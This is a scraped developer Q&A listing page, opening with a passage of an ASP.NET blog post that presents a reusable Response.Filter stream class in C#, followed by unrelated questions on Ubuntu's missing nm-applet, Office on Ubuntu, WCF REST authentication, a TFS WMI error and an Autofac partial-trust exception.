+ "/").Replace("'~/", "'" + path + "/"); return output; } The idea of the event handler is that you can do whatever you want to the stream and return back a stream – either the same one that's been modified or a brand new one – which is then sent back as the final response. The above code can be simplified even more by using the string version events, which handle the stream-to-string conversions for you: ResponseFilterStream filter = new ResponseFilterStream(Response.Filter); filter.TransformString += filter_TransformString; Response.Filter = filter; and the event handler to do the transformation, calling the same FixPaths method shown above: string filter_TransformString(string output) { return FixPaths(output); } The events for capturing output and for capturing and transforming chunks work in a very similar way. By using events to handle the transformations ResponseFilterStream becomes a reusable component, and we don't have to create a new stream class or subclass an existing Stream based class. By the way, the example used here is kind of a cool trick: it transforms "~/" expressions inside of the final generated HTML output – even in plain HTML markup, not just server controls – into the appropriate application relative path, in the same way that ResolveUrl would do.
So you can write plain old HTML like this: <a href="~/default.aspx">Home</a> and have it turned into: <a href="/myVirtual/default.aspx">Home</a> without having to use an ASP.NET control like Hyperlink or Image, or having to constantly use: <img src="<%= ResolveUrl("~/images/home.gif") %>" /> in MVC applications (which frankly is one of the most annoying things about MVC, especially given the path hell that extension-less and endpoint-less URLs impose). I can't take credit for this idea. While discussing the Response.Filter issues on Twitter I got a hint from Dylan Beattie, who pointed me at one of his examples which does something similar. I thought the idea was cool enough to use as an example for future demos of Response.Filter functionality in ASP.NET next time I do the Modules and Handlers talk (which was great fun BTW). How practical this is is debatable however, since there's definitely some overhead to using a Response.Filter in general, and especially to one that caches the output and then re-writes it later. Make sure to test for performance anytime you use a Response.Filter hookup and make sure it doesn't end up killing perf on you. You've been warned :-}. How does ResponseFilterStream work? The big win of this implementation IMHO is that it's a reusable component – so for implementation there's no new class, no subclassing – you simply attach to an event and implement an event handler method with a straightforward signature to retrieve the stream or string you're interested in. The implementation is based on a subclass of Stream, as is required in order to handle the Response.Filter requirements. What's different from other implementations I've seen in various places is that it supports capturing output as a whole to allow retrieving the full response output for capture or modification. The exceptions are the TransformWrite and TransformWriteString events, which operate only on the active chunk of data written by the Response. For captured output, the Write() method captures output into an internal MemoryStream that is cached until writing is complete. So Write() is called when ASP.NET writes to the Response stream, but the filter doesn't pass on the Write immediately to the filter's internal stream. The data is cached, and only when the Flush() method is called to finalize the Stream's output do we actually send the cached stream off for transformation (if the events are hooked up) and THEN finally write out the returned content in one big chunk. Here's the implementation of ResponseFilterStream: /// <summary> /// A semi-generic Stream implementation for Response.Filter with /// an event interface for handling Content transformations via /// Stream or String. /// <remarks> /// Use with care for large output as this implementation copies /// the output into a memory stream and so increases memory usage.
/// </remarks> /// </summary> public class ResponseFilterStream : Stream { /// <summary> /// The original stream /// </summary> Stream _stream; /// <summary> /// Current position in the original stream /// </summary> long _position; /// <summary> /// Stream that original content is read into /// and then passed to TransformStream function /// </summary> MemoryStream _cacheStream = new MemoryStream(5000); /// <summary> /// Internal pointer that keeps track of the size /// of the cacheStream /// </summary> int _cachePointer = 0; /// <summary> /// Creates the filter around the original Response.Filter stream /// </summary> /// <param name="responseStream"></param> public ResponseFilterStream(Stream responseStream) { _stream = responseStream; } /// <summary> /// Determines whether the stream is captured /// </summary> private bool IsCaptured { get { if (CaptureStream != null || CaptureString != null || TransformStream != null || TransformString != null) return true; return false; } } /// <summary> /// Determines whether the Write method is outputting data immediately /// or delaying output until Flush() is fired. /// </summary> private bool IsOutputDelayed { get { if (TransformStream != null || TransformString != null) return true; return false; } } /// <summary> /// Event that captures Response output and makes it available /// as a MemoryStream instance. Output is captured but won't /// affect Response output. /// </summary> public event Action<MemoryStream> CaptureStream; /// <summary> /// Event that captures Response output and makes it available /// as a string. Output is captured but won't affect Response output. /// </summary> public event Action<string> CaptureString; /// <summary> /// Event that allows you to transform the stream as each chunk of /// the output is written in the Write() operation of the stream. /// This means it's possible/likely that the input /// buffer will not contain the full response output but only /// one of potentially many chunks. /// /// This event is called as part of the filter stream's Write() /// operation. /// </summary> public event Func<byte[], byte[]> TransformWrite; /// <summary> /// Event that allows you to transform the response stream as /// each chunk of byte[] output is written during the stream's write /// operation. This means it's possible/likely that the string /// passed to the handler only contains a portion of the full /// output. Typical buffer chunks are around 16k a piece. /// /// This event is called as part of the stream's Write operation. /// </summary> public event Func<string, string> TransformWriteString; /// <summary> /// This event allows capturing and transformation of the entire /// output stream by caching all write operations and delaying final /// response output until Flush() is called on the stream. /// </summary> public event Func<MemoryStream, MemoryStream> TransformStream; /// <summary> /// Event that can be hooked up to handle Response.Filter /// Transformation. Passed a string that you can modify and /// return back as a return value. The modified content /// will become the final output.
/// </summary> public event Func<string, string> TransformString; protected virtual void OnCaptureStream(MemoryStream ms) { if (CaptureStream != null) CaptureStream(ms); } private void OnCaptureStringInternal(MemoryStream ms) { if (CaptureString != null) { string content = HttpContext.Current.Response.ContentEncoding.GetString(ms.ToArray()); OnCaptureString(content); } } protected virtual void OnCaptureString(string output) { if (CaptureString != null) CaptureString(output); } protected virtual byte[] OnTransformWrite(byte[] buffer) { if (TransformWrite != null) return TransformWrite(buffer); return buffer; } private byte[] OnTransformWriteStringInternal(byte[] buffer) { Encoding encoding = HttpContext.Current.Response.ContentEncoding; string output = OnTransformWriteString(encoding.GetString(buffer)); return encoding.GetBytes(output); } private string OnTransformWriteString(string value) { if (TransformWriteString != null) return TransformWriteString(value); return value; } protected virtual MemoryStream OnTransformCompleteStream(MemoryStream ms) { if (TransformStream != null) return TransformStream(ms); return ms; } /// <summary> /// Allows transforming of strings. /// /// Note this handler is internal and not meant to be overridden. /// The TransformString event has to be hooked up in order for this /// handler to even fire, which avoids the overhead of string /// conversion on every pass through. /// </summary> /// <param name="responseText"></param> /// <returns></returns> private string OnTransformCompleteString(string responseText) { // assign the transformed result back (the original version dropped the return value) if (TransformString != null) responseText = TransformString(responseText); return responseText; } /// <summary> /// Wrapper method for OnTransformString that handles /// stream-to-string and vice versa conversions /// </summary> /// <param name="ms"></param> /// <returns></returns> internal MemoryStream OnTransformCompleteStringInternal(MemoryStream ms) { if (TransformString == null) return ms; //string content = ms.GetAsString(); string content = HttpContext.Current.Response.ContentEncoding.GetString(ms.ToArray()); content = TransformString(content); byte[] buffer = HttpContext.Current.Response.ContentEncoding.GetBytes(content); ms = new MemoryStream(); ms.Write(buffer, 0, buffer.Length); //ms.WriteString(content); return ms; } /// <summary> /// /// </summary> public override bool CanRead { get { return true; } } public override bool CanSeek { get { return true; } } /// <summary> /// /// </summary> public override bool CanWrite { get { return true; } } /// <summary> /// /// </summary> public override long Length { get { return 0; } } /// <summary> /// /// </summary> public override long Position { get { return _position; } set { _position = value; } } /// <summary> /// /// </summary> /// <param name="offset"></param> /// <param name="direction"></param> /// <returns></returns> public override long Seek(long offset, System.IO.SeekOrigin direction) { return _stream.Seek(offset, direction); } /// <summary> /// /// </summary> /// <param name="length"></param> public override void SetLength(long length) { _stream.SetLength(length); } /// <summary> /// /// </summary> public override void Close() { _stream.Close(); } /// <summary> /// Override flush by writing out the cached stream data /// </summary> public override void Flush() { if (IsCaptured && _cacheStream.Length > 0) { // Check for transform implementations _cacheStream = OnTransformCompleteStream(_cacheStream); _cacheStream = OnTransformCompleteStringInternal(_cacheStream); OnCaptureStream(_cacheStream);
OnCaptureStringInternal(_cacheStream); // write the stream back out if output was delayed if (IsOutputDelayed) _stream.Write(_cacheStream.ToArray(), 0, (int)_cacheStream.Length); // Clear the cache once we've written it out _cacheStream.SetLength(0); } // default flush behavior _stream.Flush(); } /// <summary> /// /// </summary> /// <param name="buffer"></param> /// <param name="offset"></param> /// <param name="count"></param> /// <returns></returns> public override int Read(byte[] buffer, int offset, int count) { return _stream.Read(buffer, offset, count); } /// <summary> /// Overridden to capture output written by ASP.NET into a cached /// stream that is written out later when Flush() is called. /// </summary> /// <param name="buffer"></param> /// <param name="offset"></param> /// <param name="count"></param> public override void Write(byte[] buffer, int offset, int count) { if (IsCaptured) { // copy to holding buffer only - we'll write out later _cacheStream.Write(buffer, 0, count); _cachePointer += count; } // just transform this buffer if (TransformWrite != null) buffer = OnTransformWrite(buffer); if (TransformWriteString != null) buffer = OnTransformWriteStringInternal(buffer); if (!IsOutputDelayed) _stream.Write(buffer, offset, buffer.Length); } } The key features are the events and corresponding OnXXX methods that handle the event hookups, and the Write() and Flush() methods of the stream implementation. All the rest of the members tend to be plain jane passthrough stream implementation code without much consequence. I do love the way Action<T> and Func<T> make it so easy to create the event signatures for the various events – sweet. A few things to consider Performance Response.Filter is not great for performance in general as it adds another layer of indirection to the ASP.NET output pipeline, and this implementation in particular adds a memory hit as it basically duplicates the response output into the cached memory stream, which is necessary since you may have to look at the entire response. If you have large pages in particular this can cause potentially serious memory pressure in your server application. So be careful of wholesale adoption of this (or other) Response.Filters. Make sure to do some performance testing to ensure it's not killing your app's performance. Response.Filter works everywhere A few questions came up in comments and discussion as to capturing ALL output hitting the site – and yes, you can definitely do that by assigning a Response.Filter inside of a module. If you do this, however, you'll want to be very careful and decide which content you actually want to capture, especially in IIS 7, which passes ALL content – including static images/CSS etc. – through the ASP.NET pipeline. So it is important to filter only on what you're looking for – like the page extension or, maybe more effectively, the Response.ContentType (a minimal module hookup sketch follows at the end of this post). Response.Filter Chaining Originally I thought that filter chaining doesn't work at all due to a bug in the stream implementation code. But it's quite possible to assign multiple filters to the Response.Filter property.
So the following actually works to both compress the output and apply the transformed content: WebUtils.GZipEncodePage(); ResponseFilterStream filter = new ResponseFilterStream(Response.Filter); filter.TransformString += filter_TransformString; Response.Filter = filter; However the following does not work, resulting in invalid content encoding errors: ResponseFilterStream filter = new ResponseFilterStream(Response.Filter); filter.TransformString += filter_TransformString; Response.Filter = filter; WebUtils.GZipEncodePage(); In other words, multiple Response filters can work together, but it depends entirely on the implementation whether and in which order they can be chained. In this case the GZip/Deflate stream filter apparently relies on the original content length of the output and chokes when the content is modified after it. But attaching the compression first works fine, as unintuitive as that may seem. Resources: Download example code | Capture Output from ASP.NET Pages © Rick Strahl, West Wind Technologies, 2005-2010. Posted in ASP.NET
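As promised above, here is a minimal module hookup sketch (not part of the original post): it attaches ResponseFilterStream from inside an IHttpModule and filters on Response.ContentType. It assumes default response buffering, so no output has been flushed before the filter is installed.

using System;
using System.Web;

// Hedged sketch: attach the ResponseFilterStream shown above to every
// request whose response is HTML. Assumes default buffering so nothing
// has been flushed before the filter is installed.
public class ResponseFilterModule : IHttpModule
{
    public void Init(HttpApplication app)
    {
        // PostRequestHandlerExecute fires after the handler has run,
        // so Response.ContentType is known at this point.
        app.PostRequestHandlerExecute += (sender, e) =>
        {
            HttpResponse response = ((HttpApplication)sender).Response;
            if (!response.ContentType.StartsWith("text/html"))
                return; // skip images, CSS, JSON etc.

            ResponseFilterStream filter = new ResponseFilterStream(response.Filter);
            filter.TransformString += html => html; // plug a real transform in here
            response.Filter = filter;
        };
    }

    public void Dispose() { }
}

The module still has to be registered in web.config (under system.webServer/modules for IIS 7 integrated mode) before it runs.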

    Read the article

  • nm-applet gone?

    - by welp
    nm-applet seems to have disappeared from my system. I am running 12.10. Here's what I get when I check my package manager logs: ? ~ grep network-manager /var/log/dpkg.log 2012-10-06 10:37:08 upgrade network-manager-gnome:amd64 0.9.6.2-0ubuntu5 0.9.6.2-0ubuntu6 2012-10-06 10:37:08 status half-configured network-manager-gnome:amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:08 status unpacked network-manager-gnome:amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:08 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:08 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:08 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:08 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:08 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:08 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:08 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:09 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu5 2012-10-06 10:37:09 status unpacked network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-06 10:37:09 status unpacked network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-06 10:39:50 configure network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-06 10:39:50 status unpacked network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-06 10:39:50 status unpacked network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-06 10:39:50 status half-configured network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-06 10:39:50 status installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 remove network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status half-configured network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status config-files network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-28 22:27:23 status config-files network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 install network-manager-gnome:amd64 0.9.6.2-0ubuntu6 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status half-installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status half-installed 
network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status unpacked network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:03 status unpacked network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:06 configure network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:06 status unpacked network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:07 status unpacked network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:07 status half-configured network-manager-gnome:amd64 0.9.6.2-0ubuntu6 2012-10-31 19:58:07 status installed network-manager-gnome:amd64 0.9.6.2-0ubuntu6 ? ~ Unfortunately, I cannot find network-manager-applet package at all: ? ~ apt-cache search network-manager-applet ? ~ Here are the contents of /etc/apt/sources.list: ? ~ cat /etc/apt/sources.list # deb cdrom:[Ubuntu 12.04 LTS _Precise Pangolin_ - Release amd64 (20120425)]/ dists/precise/main/binary-i386/ # deb cdrom:[Ubuntu 12.04 LTS _Precise Pangolin_ - Release amd64 (20120425)]/ dists/precise/restricted/binary-i386/ # deb cdrom:[Ubuntu 12.04 LTS _Precise Pangolin_ - Release amd64 (20120425)]/ precise main restricted # See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to # newer versions of the distribution. deb http://gb.archive.ubuntu.com/ubuntu/ quantal main restricted deb-src http://gb.archive.ubuntu.com/ubuntu/ quantal main restricted ## Major bug fix updates produced after the final release of the ## distribution. deb http://gb.archive.ubuntu.com/ubuntu/ quantal-updates main restricted deb-src http://gb.archive.ubuntu.com/ubuntu/ quantal-updates main restricted ## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu ## team. Also, please note that software in universe WILL NOT receive any ## review or updates from the Ubuntu security team. deb http://gb.archive.ubuntu.com/ubuntu/ quantal universe deb-src http://gb.archive.ubuntu.com/ubuntu/ quantal universe deb http://gb.archive.ubuntu.com/ubuntu/ quantal-updates universe deb-src http://gb.archive.ubuntu.com/ubuntu/ quantal-updates universe ## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu ## team, and may not be under a free licence. Please satisfy yourself as to ## your rights to use the software. Also, please note that software in ## multiverse WILL NOT receive any review or updates from the Ubuntu ## security team. deb http://gb.archive.ubuntu.com/ubuntu/ quantal multiverse deb-src http://gb.archive.ubuntu.com/ubuntu/ quantal multiverse deb http://gb.archive.ubuntu.com/ubuntu/ quantal-updates multiverse deb-src http://gb.archive.ubuntu.com/ubuntu/ quantal-updates multiverse ## N.B. software from this repository may not have been tested as ## extensively as that contained in the main release, although it includes ## newer versions of some applications which may provide useful features. ## Also, please note that software in backports WILL NOT receive any review ## or updates from the Ubuntu security team. 
deb http://gb.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb-src http://gb.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb http://security.ubuntu.com/ubuntu quantal-security main restricted deb-src http://security.ubuntu.com/ubuntu quantal-security main restricted deb http://security.ubuntu.com/ubuntu quantal-security universe deb-src http://security.ubuntu.com/ubuntu quantal-security universe deb http://security.ubuntu.com/ubuntu quantal-security multiverse deb-src http://security.ubuntu.com/ubuntu quantal-security multiverse ## Uncomment the following two lines to add software from Canonical's ## 'partner' repository. ## This software is not part of Ubuntu, but is offered by Canonical and the ## respective vendors as a service to Ubuntu users. # deb http://archive.canonical.com/ubuntu precise partner # deb-src http://archive.canonical.com/ubuntu precise partner ## This software is not part of Ubuntu, but is offered by third-party ## developers who want to ship their latest software. deb http://extras.ubuntu.com/ubuntu quantal main deb-src http://extras.ubuntu.com/ubuntu quantal main ? ~ Right now, I can't think of anything else. Happy to provide more info upon request.
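The dpkg log above shows that nm-applet ships in the network-manager-gnome package (removed on 2012-10-28 and installed again on 2012-10-31); there is no package literally named network-manager-applet, which is why apt-cache search comes back empty. A sketch of the usual recovery steps, assuming the quantal repositories listed above are reachable:

sudo apt-get update
sudo apt-get install --reinstall network-manager-gnome
nm-applet &   # start the applet in the current session; it autostarts on the next login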

    Read the article

  • Please help me install Ubuntu 12.04.1. Can it run MS Office Professional Plus 2007?

    - by ramandeep
I want to install Ubuntu and run MS Office Professional Plus 2007 on it. I also want to format my hard drive with a slow (full) format, the way it happens when installing XP, so everything is wiped with no traces left. For that, which is the better approach: 1) formatting the entire hard drive, or 2) formatting only the partition on which I want to install Ubuntu? I need to be sure that I can run MS Office Professional Plus 2007 on Ubuntu. I have ubuntu-12.04.1-desktop-i386.iso burned to a CD and have MS Office Prof. Plus 2007 in this form - http://i.imgur.com/qAhP8.jpg I also want to know, when I update Ubuntu, how many MB the download will be.
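MS Office Professional Plus 2007 is a Windows application, so it will not run natively on Ubuntu; the usual route is the Wine compatibility layer, under which Office 2007 is reported to work reasonably well, though this is not guaranteed. A rough sketch, assuming the Office disc mounts at /media/OFFICE12 (a hypothetical mount point):

sudo apt-get install wine     # install the Wine compatibility layer
cd /media/OFFICE12            # hypothetical mount point of the Office CD
wine setup.exe                # run the Office 2007 installer under Wine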

    Read the article

  • How do you pass user credentials from WebClient to a WCF REST service?

    - by Alex
I am trying to expose a WCF REST service so that only users with a valid username and password can access it. The username and password are stored in a SQL database. Here is the service contract: public interface IDataService { [OperationContract] [WebGet(ResponseFormat = WebMessageFormat.Json)] byte[] GetData(double startTime, double endTime); } Here is the WCF configuration: <bindings> <webHttpBinding> <binding name="SecureBinding"> <security mode="Transport"> <transport clientCredentialType="Basic"/> </security> </binding> </webHttpBinding> </bindings> <behaviors> <serviceBehaviors> <behavior name="DataServiceBehavior"> <serviceMetadata httpGetEnabled="true"/> <serviceCredentials> <userNameAuthentication userNamePasswordValidationMode="Custom" customUserNamePasswordValidatorType= "CustomValidator, WCFHost" /> </serviceCredentials> </behavior> </serviceBehaviors> </behaviors> <services> <service behaviorConfiguration="DataServiceBehavior" name="DataService"> <endpoint address="" binding="webHttpBinding" bindingConfiguration="SecureBinding" contract="IDataService" /> </service> </services> I am accessing the service via the WebClient class within a Silverlight application. However, I have not been able to figure out how to pass the user credentials to the service. I tried various values for client.Credentials but none of them seem to trigger the code in my custom validator. I am getting the following error: The underlying connection was closed: An unexpected error occurred on a send. Here is some sample code I have tried: WebClient client = new WebClient(); client.Credentials = new NetworkCredential("name", "password", "domain"); client.OpenReadCompleted += new OpenReadCompletedEventHandler(GetData); client.OpenReadAsync(new Uri(uriString)); If I set the security mode to None, the whole thing works. I also tried other clientCredentialType values and none of them worked. I also self-hosted the WCF service to eliminate the issues related to IIS trying to authenticate a user before the service gets a chance. Any comments on what the underlying issue may be would be much appreciated. Thanks. Update: Thanks to Mehmet's excellent suggestions. Here is the tracing configuration I had: <system.diagnostics> <sources> <source name="System.ServiceModel" switchValue="Information, ActivityTracing" propagateActivity="true"> <listeners> <add name="xml" /> </listeners> </source> <source name="System.IdentityModel" switchValue="Information, ActivityTracing" propagateActivity="true"> <listeners> <add name="xml" /> </listeners> </source> </sources> <sharedListeners> <add name="xml" type="System.Diagnostics.XmlWriterTraceListener" initializeData="c:\Traces.svclog" /> </sharedListeners> </system.diagnostics> But I did not see any messages coming from my Silverlight client. As for https vs http, I used https as follows: string baseAddress = "https://localhost:6600/"; _webServiceHost = new WebServiceHost(typeof(DataServices), new Uri(baseAddress)); _webServiceHost.Open(); However, I did not configure any SSL certificate. Is this the problem?
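One workaround that is commonly suggested for this situation is to send the HTTP Basic credentials explicitly, since the browser HTTP stack does not forward WebClient.Credentials the way the code above expects. A sketch, assuming the service accepts Basic authentication and Silverlight 4's client HTTP stack is available; "name", "password" and uriString are the placeholders from the question:

// Hedged sketch: opt into the client HTTP stack so the Authorization
// header can be set manually, then send HTTP Basic credentials.
WebRequest.RegisterPrefix("https://", System.Net.Browser.WebRequestCreator.ClientHttp);

WebClient client = new WebClient();
string token = Convert.ToBase64String(Encoding.UTF8.GetBytes("name:password"));
client.Headers[HttpRequestHeader.Authorization] = "Basic " + token;
client.OpenReadCompleted += new OpenReadCompletedEventHandler(GetData);
client.OpenReadAsync(new Uri(uriString));

Separately, Transport security does require an SSL certificate bound to the listening port; a self-hosted https endpoint with no certificate typically fails with exactly the "underlying connection was closed" error, so binding a certificate (for example with netsh http add sslcert) is likely part of the fix.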

    Read the article

  • WMI Security error TF255437 when installing TFS 2010 RC

    - by Daniel O
Does anyone know the resolution to the following error? In this scenario, TFS will be using a local report server instance which uses a separate SQL Server database engine instance. An error occurred while querying the Windows Management Instrumentation (WMI) interface on the following computer: databaseServer. The following error message was received: Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED)).

    Read the article

  • Autofac Wcf Integration Security Problem

    - by ecoffey
I've created a WCF service to back an Ajax page (.NET 3.5). It's hosted in IIS 6.1 Integrated Pipeline. (The rest of Autofac is set up correctly for Web Forms integration.) Everything works fine and dandy with the normal WCF pipeline. However, when I plug in the Autofac WCF integration (as per the Autofac wiki) I get this delightful exception: [SecurityException: That assembly does not allow partially trusted callers.] Autofac.Integration.Wcf.AutofacHostFactory.CreateServiceHost(String constructorString, Uri[] baseAddresses) in c:\Working\Autofac\src\Source\Autofac.Integration.Wcf\AutofacHostFactory.cs:78 System.ServiceModel.HostingManager.CreateService(String normalizedVirtualPath) +604 System.ServiceModel.HostingManager.ActivateService(String normalizedVirtualPath) +46 System.ServiceModel.HostingManager.EnsureServiceAvailable(String normalizedVirtualPath) +654 My Google-fu has failed me on finding a solution to this problem. Any insights or workarounds would be appreciated.
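That exception means an assembly that is not marked with AllowPartiallyTrustedCallers is being called from a partially trusted AppDomain. If the hosting environment permits it, one commonly suggested workaround is to run the application under full trust; a sketch of the web.config change (element placement assumed, verify against your configuration):

<configuration>
  <system.web>
    <!-- Hedged workaround: full trust lets the Autofac WCF integration
         assembly be called from this application; requires that the host
         permits overriding the trust level. -->
    <trust level="Full" />
  </system.web>
</configuration>

Alternatively, a build of Autofac compiled with AllowPartiallyTrustedCallers, if one is available for your version, avoids relaxing the trust level.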

    Read the article

< Previous Page | 154 155 156 157 158 159 160 161 162 163 164 165  | Next Page >